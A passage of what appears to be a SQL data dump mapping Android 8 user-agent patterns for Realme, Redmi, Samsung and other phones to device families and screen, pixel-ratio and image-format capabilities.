Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; RMX1801) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; RMX1805) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; RMX1809) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; RMX1811) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; RMX1831) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; RNE-L01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; RNE-L02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; RNE-L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; RNE-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; RNE-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; RNE-L23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; RS9602) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; RX600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; RX700) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Redmi 3S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Redmi 4 Prime) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":699,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Redmi 4A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Redmi 4X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Redmi 5 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Redmi 5 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome (beta) Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Redmi 5 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome (beta) SA/0 Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Redmi 5 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Redmi 5 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Redmi 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Redmi 5A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Redmi 6 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":830,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Redmi 6) AppleWebKit/* (KHTML, like Gecko) Chrome','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Redmi 6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Redmi 6A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Redmi Note 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Redmi Note 4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Redmi Note 4x) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":699,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Redmi Note 5 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Redmi Note 5 pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Redmi Note 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Redmi Note 6 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":830,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Redmi S2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Redmi Y2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Redmi xx) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Ruby5S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; S1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; S10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; S10_Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; S17) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; S2 Advance) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; S2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; S3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; S3-SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; S31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; S370) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":450,\"screenHeight\":768,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; S4-KC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; S41) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; S48c) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; S50_Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; S55) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; S55_Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; S60) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; S6001L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; S60Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; S61) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; S6S6IN3G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; S70) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; S70Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; S80) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; S80Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; S9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":756,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; S90) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; S99) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; S9_Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-A260F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-A260G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-A320F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-A320FL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-A320Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-A520F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-A520W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-A530F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-A600FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-A600G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-A600GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-A605FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-A605G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-A605GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 